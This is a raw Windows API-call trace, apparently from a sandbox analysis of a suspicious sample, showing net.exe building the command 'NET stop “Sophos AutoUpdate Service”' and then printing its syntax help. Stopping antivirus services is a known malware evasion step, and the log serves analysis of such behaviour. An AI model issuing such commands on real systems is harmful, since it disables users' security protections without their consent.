(in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc66, dwLanguageId=0x0, lpBuffer=0x1ff210, nSize=0x0, Arguments=0x1ff20c | out: lpBuffer="勀Aneth.dll") returned 0xff [0114.941] wcstok (in: _String="CONTINUE: CONT$\r\nFILE: FILES$\r\nGROUP: GROUPS$\r\nREPLICATOR: REPL, REPLICATOR$\r\nSESSION: SESSIONS, SESS$\r\nSTATISTICS: STATS$\r\nUSER: USERS$\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR$\r\nSERVER: SVR, SRV$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="CONTINUE: CONT", _Context=0x3d6) returned="CONTINUE: CONT" [0114.941] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nFILE: FILES" [0114.941] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nGROUP: GROUPS" [0114.941] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nREPLICATOR: REPL, REPLICATOR" [0114.941] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSESSION: SESSIONS, SESS" [0114.941] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSTATISTICS: STATS" [0114.941] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nUSER: USERS" [0114.941] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR" [0114.941] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVER: SVR, SRV" [0114.941] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0114.941] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0114.941] wcstok (in: _String="CONTINUE: CONT", _Delimiter=":,$", _Context=0x3d6 | out: _String="CONTINUE", _Context=0x3d6) returned="CONTINUE" [0114.941] wcsspn (_String="CONTINUE", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0114.941] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" CONT" [0114.941] wcsspn (_String=" CONT", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0114.941] _wcsicmp (_String1="CONT", _String2="stop") returned -16 [0114.941] _wcsicmp (_String1="CONT", _String2="“Sophos") returned -8121 [0114.941] _wcsicmp (_String1="CONT", _String2="AutoUpdate") returned 2 [0114.941] _wcsicmp (_String1="CONT", _String2="Service”") returned -16 [0114.941] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0114.942] wcstok (in: _String="\r\nFILE: FILES", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nFILE", _Context=0x3d6) returned="\r\nFILE" [0114.942] wcsspn (_String="\r\nFILE", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0114.942] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" FILES" [0114.942] wcsspn (_String=" FILES", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0114.942] _wcsicmp (_String1="FILES", _String2="stop") returned -13 [0114.942] _wcsicmp (_String1="FILES", _String2="“Sophos") returned -8118 [0114.942] _wcsicmp (_String1="FILES", _String2="AutoUpdate") returned 5 [0114.942] _wcsicmp (_String1="FILES", _String2="Service”") returned -13 [0114.942] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0114.942] wcstok (in: _String="\r\nGROUP: GROUPS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nGROUP", _Context=0x3d6) returned="\r\nGROUP" [0114.942] wcsspn (_String="\r\nGROUP", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0114.942] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" GROUPS" [0114.942] wcsspn (_String=" GROUPS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0114.942] _wcsicmp (_String1="GROUPS", _String2="stop") returned -12 [0114.942] _wcsicmp (_String1="GROUPS", _String2="“Sophos") returned -8117 [0114.942] _wcsicmp (_String1="GROUPS", _String2="AutoUpdate") returned 6 [0114.942] _wcsicmp (_String1="GROUPS", _String2="Service”") returned -12 [0114.942] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0114.942] wcstok (in: _String="\r\nREPLICATOR: REPL, REPLICATOR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nREPLICATOR", _Context=0x3d6) returned="\r\nREPLICATOR" [0114.942] wcsspn (_String="\r\nREPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0114.942] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPL" [0114.942] wcsspn (_String=" REPL", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0114.942] _wcsicmp (_String1="REPL", _String2="stop") returned -1 [0114.942] _wcsicmp (_String1="REPL", _String2="“Sophos") returned -8106 [0114.942] _wcsicmp (_String1="REPL", _String2="AutoUpdate") returned 17 [0114.942] _wcsicmp (_String1="REPL", _String2="Service”") returned -1 [0114.942] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPLICATOR" [0114.942] wcsspn (_String=" REPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0114.942] _wcsicmp (_String1="REPLICATOR", _String2="stop") returned -1 [0114.942] _wcsicmp (_String1="REPLICATOR", _String2="“Sophos") returned -8106 [0114.943] _wcsicmp (_String1="REPLICATOR", _String2="AutoUpdate") returned 17 [0114.943] _wcsicmp (_String1="REPLICATOR", _String2="Service”") returned -1 [0114.943] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0114.943] wcstok (in: _String="\r\nSESSION: SESSIONS, SESS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSESSION", _Context=0x3d6) returned="\r\nSESSION" [0114.943] wcsspn (_String="\r\nSESSION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0114.943] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESSIONS" [0114.943] wcsspn (_String=" SESSIONS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0114.943] _wcsicmp (_String1="SESSIONS", _String2="stop") returned -15 [0114.943] _wcsicmp (_String1="SESSIONS", _String2="“Sophos") returned -8105 [0114.943] _wcsicmp (_String1="SESSIONS", _String2="AutoUpdate") returned 18 [0114.943] _wcsicmp (_String1="SESSIONS", _String2="Service”") returned 1 [0114.943] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESS" [0114.943] wcsspn (_String=" SESS", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0114.943] _wcsicmp (_String1="SESS", _String2="stop") returned -15 [0114.943] _wcsicmp (_String1="SESS", _String2="“Sophos") returned -8105 [0114.943] _wcsicmp (_String1="SESS", _String2="AutoUpdate") returned 18 [0114.943] _wcsicmp (_String1="SESS", _String2="Service”") returned 1 [0114.943] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0114.943] wcstok (in: _String="\r\nSTATISTICS: STATS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSTATISTICS", _Context=0x3d6) returned="\r\nSTATISTICS" [0114.943] wcsspn (_String="\r\nSTATISTICS", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0114.943] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" STATS" [0114.943] wcsspn (_String=" STATS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0114.943] _wcsicmp (_String1="STATS", _String2="stop") returned -14 [0114.943] _wcsicmp (_String1="STATS", _String2="“Sophos") returned -8105 [0114.943] _wcsicmp (_String1="STATS", _String2="AutoUpdate") returned 18 [0114.943] _wcsicmp (_String1="STATS", _String2="Service”") returned 15 [0114.943] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0114.943] wcstok (in: _String="\r\nUSER: USERS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nUSER", _Context=0x3d6) returned="\r\nUSER" [0114.943] wcsspn (_String="\r\nUSER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0114.944] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" USERS" [0114.944] wcsspn (_String=" USERS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0114.944] _wcsicmp (_String1="USERS", _String2="stop") returned 2 [0114.944] _wcsicmp (_String1="USERS", _String2="“Sophos") returned -8103 [0114.944] _wcsicmp (_String1="USERS", _String2="AutoUpdate") returned 20 [0114.944] _wcsicmp (_String1="USERS", _String2="Service”") returned 2 [0114.944] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0114.944] wcstok (in: _String="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nWORKSTATION", _Context=0x3d6) returned="\r\nWORKSTATION" [0114.944] wcsspn (_String="\r\nWORKSTATION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0114.944] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIRECTOR" [0114.944] wcsspn (_String=" REDIRECTOR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0114.944] _wcsicmp (_String1="REDIRECTOR", _String2="stop") returned -1 [0114.944] _wcsicmp (_String1="REDIRECTOR", _String2="“Sophos") returned -8106 [0114.944] _wcsicmp (_String1="REDIRECTOR", _String2="AutoUpdate") returned 17 [0114.944] _wcsicmp (_String1="REDIRECTOR", _String2="Service”") returned -1 [0114.944] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIR" [0114.944] wcsspn (_String=" REDIR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0114.944] _wcsicmp (_String1="REDIR", _String2="stop") returned -1 [0114.944] _wcsicmp (_String1="REDIR", _String2="“Sophos") returned -8106 [0114.944] _wcsicmp (_String1="REDIR", _String2="AutoUpdate") returned 17 [0114.944] _wcsicmp (_String1="REDIR", _String2="Service”") returned -1 [0114.944] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" RDR" [0114.944] wcsspn (_String=" RDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0114.944] _wcsicmp (_String1="RDR", _String2="stop") returned -1 [0114.944] _wcsicmp (_String1="RDR", _String2="“Sophos") returned -8106 [0114.944] _wcsicmp (_String1="RDR", _String2="AutoUpdate") returned 17 [0114.944] _wcsicmp (_String1="RDR", _String2="Service”") returned -1 [0114.944] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WORK" [0114.945] wcsspn (_String=" WORK", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0114.945] _wcsicmp (_String1="WORK", _String2="stop") returned 4 [0114.945] _wcsicmp (_String1="WORK", _String2="“Sophos") returned -8101 [0114.945] _wcsicmp (_String1="WORK", _String2="AutoUpdate") returned 22 [0114.945] _wcsicmp (_String1="WORK", _String2="Service”") returned 4 [0114.945] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WKSTA" [0114.945] wcsspn (_String=" WKSTA", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0114.945] _wcsicmp (_String1="WKSTA", _String2="stop") returned 4 [0114.945] _wcsicmp (_String1="WKSTA", _String2="“Sophos") returned -8101 [0114.945] _wcsicmp (_String1="WKSTA", _String2="AutoUpdate") returned 22 [0114.945] _wcsicmp (_String1="WKSTA", _String2="Service”") returned 4 [0114.945] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" PRDR" [0114.945] wcsspn (_String=" PRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0114.945] _wcsicmp (_String1="PRDR", _String2="stop") returned -3 [0114.945] _wcsicmp (_String1="PRDR", _String2="“Sophos") returned -8108 [0114.945] _wcsicmp (_String1="PRDR", _String2="AutoUpdate") returned 15 [0114.945] _wcsicmp (_String1="PRDR", _String2="Service”") returned -3 [0114.945] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" DEVRDR" [0114.945] wcsspn (_String=" DEVRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0114.945] _wcsicmp (_String1="DEVRDR", _String2="stop") returned -15 [0114.945] _wcsicmp (_String1="DEVRDR", _String2="“Sophos") returned -8120 [0114.945] _wcsicmp (_String1="DEVRDR", _String2="AutoUpdate") returned 3 [0114.945] _wcsicmp (_String1="DEVRDR", _String2="Service”") returned -15 [0114.945] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0114.945] wcstok (in: _String="\r\nSERVER: SVR, SRV", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSERVER", _Context=0x3d6) returned="\r\nSERVER" [0114.945] wcsspn (_String="\r\nSERVER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0114.945] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SVR" [0114.945] wcsspn (_String=" SVR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0114.945] _wcsicmp (_String1="SVR", _String2="stop") returned 2 [0114.946] _wcsicmp (_String1="SVR", _String2="“Sophos") returned -8105 [0114.946] _wcsicmp (_String1="SVR", _String2="AutoUpdate") returned 18 [0114.946] _wcsicmp (_String1="SVR", _String2="Service”") returned 17 [0114.946] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SRV" [0114.946] wcsspn (_String=" SRV", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0114.946] _wcsicmp (_String1="SRV", _String2="stop") returned -2 [0114.946] _wcsicmp (_String1="SRV", _String2="“Sophos") returned -8105 [0114.946] _wcsicmp (_String1="SRV", _String2="AutoUpdate") returned 18 [0114.946] _wcsicmp (_String1="SRV", _String2="Service”") returned 13 [0114.946] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0114.946] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc67, dwLanguageId=0x0, lpBuffer=0x1ff210, nSize=0x0, Arguments=0x1ff20c | out: lpBuffer="哈Aꔺ盹") returned 0x1c [0114.946] wcstok (in: _String="NAMES$\r\nSYNTAX$\r\nSERVICES$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="NAMES", _Context=0x3d6) returned="NAMES" [0114.946] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSYNTAX" [0114.946] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVICES" [0114.946] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0114.946] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0114.946] wcsspn (_String="NAMES", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0114.946] _wcsicmp (_String1="stop", _String2="NAMES") returned 5 [0114.946] wcsspn (_String="\r\nSYNTAX", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0114.946] _wcsicmp (_String1="stop", _String2="SYNTAX") returned -5 [0114.946] wcsspn (_String="\r\nSERVICES", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0114.946] _wcsicmp (_String1="stop", _String2="SERVICES") returned 15 [0114.947] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0114.947] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0114.963] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x111d, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The syntax of this command is:\r\n") returned 0x20 [0114.964] GetFileType (hFile=0x0) returned 0x0 [0114.964] LocalAlloc (uFlags=0x0, uBytes=0x40) returned 0x413ab8 [0114.964] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The syntax of this command is:\r\n", cchWideChar=32, lpMultiByteStr=0x413ab8, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The syntax of this command is:\r\n", lpUsedDefaultChar=0x0) returned 32 [0114.964] WriteFile (in: hFile=0x0, lpBuffer=0x413ab8, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ff1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1ff1f0, lpOverlapped=0x0) returned 0 [0114.964] LocalFree (hMem=0x413ab8) returned 0x0 [0114.964] GetFileType (hFile=0x0) returned 0x0 [0114.964] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4137b8 [0114.964] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4137b8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nA", lpUsedDefaultChar=0x0) returned 2 [0114.964] WriteFile (in: hFile=0x0, lpBuffer=0x4137b8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1ff1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1ff1f0, lpOverlapped=0x0) returned 0 [0114.964] LocalFree (hMem=0x4137b8) returned 0x0 [0114.964] wcscpy_s (in: _Destination=0x1ff2a8, _SizeInWords=0x200, _Source="NET" | out: _Destination="NET") returned 0x0 [0114.964] wcsncat_s (in: _Destination="NET", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET ") returned 0x0 [0114.964] wcsncat_s (in: _Destination="NET ", _SizeInWords=0x200, _Source="stop", _MaxCount=0xffffffff | out: _Destination="NET stop") returned 0x0 [0114.964] wcsncat_s (in: _Destination="NET stop", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ") returned 0x0 [0114.964] wcsncat_s (in: _Destination="NET stop ", _SizeInWords=0x200, _Source="“Sophos", _MaxCount=0xffffffff | out: _Destination="NET stop “Sophos") returned 0x0 [0114.964] wcsncat_s (in: _Destination="NET stop “Sophos", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop “Sophos ") returned 0x0 [0114.964] wcsncat_s (in: _Destination="NET stop “Sophos ", _SizeInWords=0x200, _Source="AutoUpdate", _MaxCount=0xffffffff | out: _Destination="NET stop “Sophos AutoUpdate") returned 0x0 [0114.964] wcsncat_s (in: _Destination="NET stop “Sophos AutoUpdate", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop “Sophos AutoUpdate ") returned 0x0 [0114.964] wcsncat_s (in: _Destination="NET stop “Sophos AutoUpdate ", _SizeInWords=0x200, _Source="Service”", _MaxCount=0xffffffff | out: _Destination="NET stop “Sophos AutoUpdate Service”") returned 0x0 [0114.964] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A댸9\x1fѰ9") returned 0xad [0114.964] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{minutes", _MaxCount=0x24) returned 18 [0114.965] LocalFree (hMem=0x415510) returned 0x0 [0114.965] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x2e [0114.965] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="NET COMPUTER\r\n\\\\computername {/ADD |", _MaxCount=0x24) returned 16 [0114.965] LocalFree (hMem=0x415510) returned 0x0 [0114.965] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x7d [0114.965] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="NET CONFIG SERVER\r\n[/AUTODISCONNECT:", _MaxCount=0x24) returned 16 [0114.965] LocalFree (hMem=0x415510) returned 0x0 [0114.965] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x26 [0114.965] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="NET CONFIG\r\n[SERVER | WORKSTATION]\r\n", _MaxCount=0x24) returned 16 [0114.965] LocalFree (hMem=0x415510) returned 0x0 [0114.965] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x19 [0114.965] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x24) returned 16 [0114.965] LocalFree (hMem=0x415510) returned 0x0 [0114.965] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x1b [0114.965] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x24) returned 13 [0114.965] LocalFree (hMem=0x415510) returned 0x0 [0114.965] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0xbe [0114.965] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="NET GROUP\r\n[groupname [/COMMENT:\"tex", _MaxCount=0x24) returned 12 [0114.965] LocalFree (hMem=0x415510) returned 0x0 [0114.965] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x33 [0114.965] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="NET HELP\r\ncommand\r\n -or-\r\nNET co", _MaxCount=0x24) returned 11 [0114.965] LocalFree (hMem=0x415510) returned 0x0 [0114.965] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x19 [0114.965] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x24) returned 11 [0114.965] LocalFree (hMem=0x415510) returned 0x0 [0114.965] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0xc1 [0114.965] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="NET LOCALGROUP\r\n[groupname [/COMMENT", _MaxCount=0x24) returned 7 [0114.965] LocalFree (hMem=0x415510) returned 0x0 [0114.965] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x16 [0114.965] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x24) returned 3 [0114.965] LocalFree (hMem=0x415510) returned 0x0 [0114.966] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x33 [0114.966] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="NET SESSION\r\n[\\\\computername] [/DELE", _MaxCount=0x24) returned 15 [0114.966] LocalFree (hMem=0x415510) returned 0x0 [0114.966] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x234 [0114.966] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="NET SHARE\r\nsharename\r\n shar", _MaxCount=0x24) returned 12 [0114.966] LocalFree (hMem=0x415510) returned 0x0 [0114.966] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x13 [0114.967] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="NET START BROWSER\r\n", _MaxCount=0x24) returned 14 [0114.967] LocalFree (hMem=0x415510) returned 0x0 [0114.967] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x14 [0114.967] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x24) returned 14 [0114.967] LocalFree (hMem=0x415510) returned 0x0 [0114.967] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x14 [0114.967] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="NET START EVENTLOG\r\n", _MaxCount=0x24) returned 14 [0114.967] LocalFree (hMem=0x415510) returned 0x0 [0114.967] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x15 [0114.967] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="NET START MESSENGER\r\n", _MaxCount=0x24) returned 14 [0114.967] LocalFree (hMem=0x415510) returned 0x0 [0114.967] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74680000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x1ff1f0, nSize=0x0, Arguments=0x1ff1ec | out: lpBuffer="唐A⡋盺\x1f唐A\x1f") returned 0x15 [0114.967] _wcsnicmp (_String1="NET stop “Sophos AutoUpdate Service”", _String2="NET START NET LOGON\r\n", _MaxCount=0x24) returned 14 [0114.967] LocalFree (hMem=0x415510) returned 0x0 [0114.967] FormatMessageW (in: dwFlags=0x1900, 